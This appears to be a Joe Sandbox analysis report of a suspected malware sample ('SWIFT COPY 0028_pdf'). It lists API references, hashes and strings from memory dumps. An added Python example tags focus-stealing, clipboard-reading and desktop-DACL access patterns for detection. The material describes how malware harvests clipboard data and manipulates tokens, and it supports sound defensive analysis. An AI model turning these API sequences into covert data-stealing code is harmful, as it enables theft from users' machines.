                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 2516578528-4164748364
                                                                                    • Opcode ID: 8589d563d28a1d64f173cdda754321b8dbdbb13e960f148508f7cbd218581775
                                                                                    • Instruction ID: 0169e0b06923b60b859f47a409c100d0ac03045cdbade28fd1c6677527f33ef2
                                                                                    • Opcode Fuzzy Hash: 8589d563d28a1d64f173cdda754321b8dbdbb13e960f148508f7cbd218581775
                                                                                    • Instruction Fuzzy Hash: FD32CA70608344EFDB20EF68C894BAABBA8FF49354F140A29F696873A1C731DC50DB51
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0098B1CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 3850602802-328681919
                                                                                    • Opcode ID: 146ce72ddaa97db2a312050a97515f55e92095cf3f13687636b9bb9d7412baf6
                                                                                    • Instruction ID: f3d3611fd1441bb9a238ec064d87c8e2d3dcf5e01bbc04300020f2da8ea0f014
                                                                                    • Opcode Fuzzy Hash: 146ce72ddaa97db2a312050a97515f55e92095cf3f13687636b9bb9d7412baf6
                                                                                    • Instruction Fuzzy Hash: 9112F171604208AFEB24AF64CC49FAE7BB8FF85710F18451AF91ADB2E1DB749901CB51
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0093EB4A
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00993AEA
                                                                                    • IsIconic.USER32(000000FF), ref: 00993AF3
                                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00993B00
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00993B0A
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00993B20
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00993B27
                                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00993B33
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00993B44
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00993B4C
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00993B54
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00993B57
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B6C
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993B77
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B81
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993B86
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B8F
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993B94
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B9E
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00993BA3
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00993BA6
                                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00993BCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 9caa6bc041d3d033f7750fbef6bc6259d8bfefdf641db899922e85a58df8a2df
                                                                                    • Instruction ID: e2af61a8ee51a714967319461befc50c91e393e65f1c70e24ec7f4305a87ece6
                                                                                    • Opcode Fuzzy Hash: 9caa6bc041d3d033f7750fbef6bc6259d8bfefdf641db899922e85a58df8a2df
                                                                                    • Instruction Fuzzy Hash: DD3192B1A54218BBEF206F658C49F7F7E6CEF45B50F108025FA06EA1D0D6B19D00AAE0
                                                                                    APIs
                                                                                      • Part of subcall function 0095B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095B180
                                                                                      • Part of subcall function 0095B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
                                                                                      • Part of subcall function 0095B134: GetLastError.KERNEL32 ref: 0095B1BA
                                                                                    • _memset.LIBCMT ref: 0095AD08
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0095AD5A
                                                                                    • CloseHandle.KERNEL32(?), ref: 0095AD6B
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0095AD82
                                                                                    • GetProcessWindowStation.USER32 ref: 0095AD9B
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 0095ADA5
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0095ADBF
                                                                                      • Part of subcall function 0095AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0095ACC0), ref: 0095AB99
                                                                                      • Part of subcall function 0095AB84: CloseHandle.KERNEL32(?,?,0095ACC0), ref: 0095ABAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2063423040-1027155976
                                                                                    • Opcode ID: 94586efca27bd9689d292cb1c81ed88b514f992544050ddf68837bf929ee3dfc
                                                                                    • Instruction ID: 75783bf7aeec55cc34bbbd5c4c2f02b28ad2d7d8f1fc46f8eaabd191b938affe
                                                                                    • Opcode Fuzzy Hash: 94586efca27bd9689d292cb1c81ed88b514f992544050ddf68837bf929ee3dfc
                                                                                    • Instruction Fuzzy Hash: AC819AB1801209AFDF11DFA5DC89AEEBBBCEF08305F044219FD15A61A1D7318E49DB66
                                                                                    APIs
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00965FA6,?), ref: 00966ED8
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00965FA6,?), ref: 00966EF1
                                                                                      • Part of subcall function 0096725E: __wsplitpath.LIBCMT ref: 0096727B
                                                                                      • Part of subcall function 0096725E: __wsplitpath.LIBCMT ref: 0096728E
                                                                                      • Part of subcall function 009672CB: GetFileAttributesW.KERNEL32(?,00966019), ref: 009672CC
                                                                                    • _wcscat.LIBCMT ref: 00966149
                                                                                    • _wcscat.LIBCMT ref: 00966167
                                                                                    • __wsplitpath.LIBCMT ref: 0096618E
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009661A4
                                                                                    • _wcscpy.LIBCMT ref: 00966209
                                                                                    • _wcscat.LIBCMT ref: 0096621C
                                                                                    • _wcscat.LIBCMT ref: 0096622F
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0096625D
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0096626E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00966289
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00966298
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 009662AD
                                                                                    • DeleteFileW.KERNEL32(?), ref: 009662BE
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009662E1
                                                                                    • FindClose.KERNEL32(00000000), ref: 009662FD
                                                                                    • FindClose.KERNEL32(00000000), ref: 0096630B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                    • String ID: \*.*$p1#v`K$v
                                                                                    • API String ID: 1917200108-1732502266
                                                                                    • Opcode ID: 8aa18e8890dc1508362688703f0a2cbed2a1b46c5dfffa8ce4ab90b85dcf7491
                                                                                    • Instruction ID: 8ebfcca05f8fdbf849b135d0827be34c22b60411db18c866ff813ae6abe1d7ae
                                                                                    • Opcode Fuzzy Hash: 8aa18e8890dc1508362688703f0a2cbed2a1b46c5dfffa8ce4ab90b85dcf7491
                                                                                    • Instruction Fuzzy Hash: 3351207280911CAACB21EB91CC54EDFB7BCAF45300F0505E6E595E3141DE36AB89DFA4
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(009BDC00), ref: 00976B36
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00976B44
                                                                                    • GetClipboardData.USER32(0000000D), ref: 00976B4C
                                                                                    • CloseClipboard.USER32 ref: 00976B58
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00976B74
                                                                                    • CloseClipboard.USER32 ref: 00976B7E
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00976B93
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00976BA0
                                                                                    • GetClipboardData.USER32(00000001), ref: 00976BA8
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00976BB5
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00976BE9
                                                                                    • CloseClipboard.USER32 ref: 00976CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                    • String ID:
                                                                                    • API String ID: 3222323430-0
                                                                                    • Opcode ID: 4d7d43953726b70646fe406ae31ca324baada8b76cecf81033d99f5adce8d90f
                                                                                    • Instruction ID: 74b20f7ab1c01ee493f09372bef2dcc214a5fc6208b38fd2e23b711d74c3b542
                                                                                    • Opcode Fuzzy Hash: 4d7d43953726b70646fe406ae31ca324baada8b76cecf81033d99f5adce8d90f
                                                                                    • Instruction Fuzzy Hash: 9F51C172249601ABD301EF64DD4AF6E77A8EF85B00F048429F69AD71E1DF70D805DBA2
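                                                                                    Three of the function records above carry a recognisable capability each: the Shell_TrayWnd routine (AttachThreadInput, SetForegroundWindow and a keybd_event of virtual key 0x12, i.e. Alt), the winsta0 / default routine (AdjustTokenPrivileges, then OpenWindowStationW and OpenDesktopW with access mask 0x60081) and the clipboard routine (OpenClipboard, GetClipboardData for formats 0xD and 1, GlobalLock). The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it parses API-reference lines in the format this page uses and tags a record when it matches one of those three patterns. The Win32 constants (VK_MENU = 0x12, CF_TEXT = 1, CF_UNICODETEXT = 0xD, the DESKTOP_* bits and READ_CONTROL / WRITE_DAC / WRITE_OWNER) are from the SDK headers; the rule logic and the tag names are this example's own choices, and the embedded records are a constructed subset of the lines listed above.

```python
"""Tag Joe Sandbox IDA-plugin API records for three behaviours seen in this
report: the AttachThreadInput/Alt-keypress focus steal, clipboard text reads,
and a winsta0/default-desktop open with WRITE_DAC after a privilege adjustment.
Added example; constants are from the Win32 SDK, the rules are illustrative."""
import re
from dataclasses import dataclass

VK_MENU = 0x12                      # Alt; the trace shows keybd_event(00000012, ...)
CF_TEXT, CF_UNICODETEXT = 0x1, 0xD  # GetClipboardData(00000001) / (0000000D)
DESKTOP_RIGHTS = {                  # access-mask bits relevant to OpenDesktopW
    0x00001: "DESKTOP_READOBJECTS", 0x00002: "DESKTOP_CREATEWINDOW",
    0x00080: "DESKTOP_WRITEOBJECTS", 0x00100: "DESKTOP_SWITCHDESKTOP",
    0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
}
# "Name.MODULE(a,b), ref: ADDR" or "Name.MODULE ref: ADDR"; a leading
# "Part of subcall function X:" prefix is simply not part of the match.
_LINE = re.compile(r"(\w+)\.(\w+)(?:\(([^)]*)\),)? ref: ([0-9A-Fa-f]+)")


@dataclass
class Call:
    name: str
    module: str
    args: list   # int for hex literals, str for '?' and string arguments
    ref: int


def _arg(tok):
    tok = tok.strip()
    try:
        return int(tok, 16)
    except ValueError:
        return tok          # '?', 'winsta0', 'Shell_TrayWnd', ...


def parse_trace(text):
    """Parse the bullet lines of one function record into Call objects."""
    calls = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            args = [_arg(a) for a in m.group(3).split(",")] if m.group(3) else []
            calls.append(Call(m.group(1), m.group(2), args, int(m.group(4), 16)))
    return calls


def is_focus_steal(calls):
    """AttachThreadInput + SetForegroundWindow plus a synthetic Alt press:
    keybd_event(VK_MENU) satisfies the foreground-activation rules so the
    window is brought to the front without any user input."""
    names = {c.name for c in calls}
    alt = any(c.name == "keybd_event" and c.args[:1] == [VK_MENU] for c in calls)
    return alt and {"AttachThreadInput", "SetForegroundWindow"} <= names


def clipboard_formats_read(calls):
    """Formats pulled via GetClipboardData when the record also opens the
    clipboard and locks the returned HGLOBAL, i.e. actually reads the data."""
    names = {c.name for c in calls}
    if not {"OpenClipboard", "GlobalLock"} <= names:
        return []
    return sorted({c.args[0] for c in calls if c.name == "GetClipboardData"
                   and c.args and isinstance(c.args[0], int)})


def decode_desktop_access(mask):
    return [n for bit, n in sorted(DESKTOP_RIGHTS.items()) if mask & bit]


def desktop_dacl_access(calls):
    """AdjustTokenPrivileges followed by OpenDesktopW with WRITE_DAC, the
    access needed to rewrite the interactive desktop's DACL for another
    token. Returns the decoded desktop access mask, or None."""
    if "AdjustTokenPrivileges" not in {c.name for c in calls}:
        return None
    for c in calls:
        if c.name == "OpenDesktopW" and len(c.args) == 4 and isinstance(c.args[3], int):
            rights = decode_desktop_access(c.args[3])
            if "WRITE_DAC" in rights:
                return rights
    return None


def classify(text):
    calls = parse_trace(text)
    tags = set()
    if is_focus_steal(calls):
        tags.add("focus-steal")
    if clipboard_formats_read(calls):
        tags.add("clipboard-read")
    if desktop_dacl_access(calls):
        tags.add("desktop-dacl")
    return tags


# Constructed subsets of the function records on this page.
FOCUS_RECORD = """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00993AEA
• SetForegroundWindow.USER32(000000FF), ref: 00993B0A
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00993B44
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00993B6C
• keybd_event.USER32(00000012,00000000), ref: 00993B77
"""
DESKTOP_RECORD = """
• Part of subcall function 0095B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0095AD82
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0095ADBF
"""
CLIPBOARD_RECORD = """
• OpenClipboard.USER32(009BDC00), ref: 00976B36
• GetClipboardData.USER32(0000000D), ref: 00976B4C
• GlobalLock.KERNEL32(00000000), ref: 00976B74
• GetClipboardData.USER32(00000001), ref: 00976BA8
"""
SENDMSG_RECORD = "• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0098B1CD"

if __name__ == "__main__":
    for label, rec in [("focus", FOCUS_RECORD), ("desktop", DESKTOP_RECORD),
                       ("clipboard", CLIPBOARD_RECORD), ("sendmsg", SENDMSG_RECORD)]:
        print(label, sorted(classify(rec)) or "-")
```

                                                                                    These records are static cross-references the IDA plugin collected from the dumped image, not an execution order, so a tag means the function is capable of the behaviour, not that the sample exercised it. For a binary flagged as a compiled AutoIt script the runtime ships these helpers whether or not the script calls them (the @GUI_DRAGID string and the Shell_TrayWnd lookup in the neighbouring records are characteristic of the interpreter), so corroborate a tag with the report's dynamic signatures, such as the clipboard-read and thread-injection entries in the signature list, before treating it as observed behaviour.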
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0096F62B
                                                                                    • FindClose.KERNEL32(00000000), ref: 0096F67F
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096F6A4
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096F6BB
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0096F6E2
                                                                                    • __swprintf.LIBCMT ref: 0096F72E
                                                                                    • __swprintf.LIBCMT ref: 0096F767
                                                                                    • __swprintf.LIBCMT ref: 0096F7BB
                                                                                      • Part of subcall function 0094172B: __woutput_l.LIBCMT ref: 00941784
                                                                                    • __swprintf.LIBCMT ref: 0096F809
                                                                                    • __swprintf.LIBCMT ref: 0096F858
                                                                                    • __swprintf.LIBCMT ref: 0096F8A7
                                                                                    • __swprintf.LIBCMT ref: 0096F8F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 835046349-2428617273
                                                                                    • Opcode ID: 8b881a9cfd5964f6af0274d1f40607e2ac77af0a0a1de0f0327f6d84eb1415ed
                                                                                    • Instruction ID: ed0f7e0013ea3d330ee4519bd3a59d34ce2d01397a66b9824ca8209d53860c1e
                                                                                    • Opcode Fuzzy Hash: 8b881a9cfd5964f6af0274d1f40607e2ac77af0a0a1de0f0327f6d84eb1415ed
                                                                                    • Instruction Fuzzy Hash: E3A10DB2408354ABC314EBA4D895EAFB7ECAFD8704F44482EF595C3151EB34DA49CB62
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00971B50
                                                                                    • _wcscmp.LIBCMT ref: 00971B65
                                                                                    • _wcscmp.LIBCMT ref: 00971B7C
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00971B8E
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00971BA8
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00971BC0
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971BCB
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00971BE7
                                                                                    • _wcscmp.LIBCMT ref: 00971C0E
                                                                                    • _wcscmp.LIBCMT ref: 00971C25
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00971C37
                                                                                    • SetCurrentDirectoryW.KERNEL32(009D39FC), ref: 00971C55
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00971C5F
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971C6C
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971C7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: edf8dd52c1d376825c20db5546fb4ed28138d86e7d5687e9a6a5717b8aa2fcdc
                                                                                    • Instruction ID: 919ecde287a4f8212de054ef8d167cc890155bbe7efe04fc7e92b66271aad99e
                                                                                    • Opcode Fuzzy Hash: edf8dd52c1d376825c20db5546fb4ed28138d86e7d5687e9a6a5717b8aa2fcdc
                                                                                    • Instruction Fuzzy Hash: C3310832645219ABCF159FF4DC49BDE73AC9F46324F148166F81AE3090EB70DF858AA4
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00971CAB
                                                                                    • _wcscmp.LIBCMT ref: 00971CC0
                                                                                    • _wcscmp.LIBCMT ref: 00971CD7
                                                                                      • Part of subcall function 00966BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00966BEF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00971D06
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971D11
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00971D2D
                                                                                    • _wcscmp.LIBCMT ref: 00971D54
                                                                                    • _wcscmp.LIBCMT ref: 00971D6B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00971D7D
                                                                                    • SetCurrentDirectoryW.KERNEL32(009D39FC), ref: 00971D9B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00971DA5
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971DB2
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971DC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: f6746239ce7286d6611f1ff612c29078f6c49c8b2029a8e81b424c879cd466ab
                                                                                    • Instruction ID: c30f93f2c76a34e9522b06909c51de1dd98c22b7f02b34d741dd947c7f83d2a1
                                                                                    • Opcode Fuzzy Hash: f6746239ce7286d6611f1ff612c29078f6c49c8b2029a8e81b424c879cd466ab
                                                                                    • Instruction Fuzzy Hash: B7313933505619ABCF20AFA8DC09BDE37AC9F45324F148552F809A31D0DB70DE85DE90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                    • API String ID: 2102423945-2023335898
                                                                                    • Opcode ID: f20d50e9c8e66e6456660af15e20cdd10ca3c398bcc476f446cff52f00bf8563
                                                                                    • Instruction ID: 7a1d9f79c03198aa27eb3e10424020f4099d26664ef255677fa44a8aa3829ba9
                                                                                    • Opcode Fuzzy Hash: f20d50e9c8e66e6456660af15e20cdd10ca3c398bcc476f446cff52f00bf8563
                                                                                    • Instruction Fuzzy Hash: 8E82BF71D04229CBCF24CF98D8907AEF7B5BF48310F2585AAD819BB295E7349D81CB90
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 009709DF
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 009709EF
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009709FB
                                                                                    • __wsplitpath.LIBCMT ref: 00970A59
                                                                                    • _wcscat.LIBCMT ref: 00970A71
                                                                                    • _wcscat.LIBCMT ref: 00970A83
